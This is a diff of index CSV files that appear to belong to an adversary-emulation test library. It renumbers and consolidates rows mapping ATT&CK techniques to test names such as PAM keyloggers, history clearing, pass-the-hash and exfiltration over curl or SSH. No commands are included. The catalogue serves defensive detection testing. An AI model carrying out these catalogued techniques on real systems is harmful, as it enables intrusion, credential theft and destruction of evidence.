+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
@@ -134,18 +127,16 @@ defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Deliver
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
 defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -187,15 +178,13 @@ persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Cr
 persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
+command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
 command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
@@ -222,8 +211,7 @@ collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/me
 collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
 collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
-collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
+collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
 collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
 collection,T1005,Data from Local System,2,Find and dump sqlite databases (Linux),00cbb875-7ae4-4cf1-b638-e543fd825300,bash
 collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
@@ -275,11 +263,10 @@ privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Ser
 privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -332,8 +319,7 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
 discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
-discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
-discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
+discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
@@ -399,14 +385,10 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
 execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,13,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -429,11 +411,10 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
 impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -29,11 +29,11 @@ defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Ma
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",17,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
 defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
@@ -138,7 +138,7 @@ collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f05622
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
-collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
 collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
 collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 collection,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
@@ -199,8 +199,8 @@ discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b67
 discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
-discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
-discovery,T1087.001,Account Discovery: Local Account,8,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
+discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
+discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
 discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -76,9 +76,9 @@ defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe -
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
 defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,17,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,18,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,19,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
@@ -336,8 +336,8 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a si
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,11,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
 defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
 defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
@@ -808,7 +808,7 @@ collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e
 collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
 collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
 collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Data Staged: Local Data Staging,4,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
 collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
 collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
 collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
@@ -999,9 +999,9 @@ discovery,T1087.002,Account Discovery: Domain Account,19,Suspicious LAPS Attribu
 discovery,T1087.002,Account Discovery: Domain Account,20,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,ffbcfd62-15d6-4989-a21a-80bfc8e58bb5,powershell
 discovery,T1087.002,Account Discovery: Domain Account,21,Suspicious LAPS Attributes Query with adfind all properties,abf00f6c-9983-4d9a-afbc-6b1c6c6448e1,powershell
 discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,51a98f96-0269-4e09-a10f-e307779a8b05,powershell
-discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
-discovery,T1087.001,Account Discovery: Local Account,10,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
-discovery,T1087.001,Account Discovery: Local Account,11,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
+discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
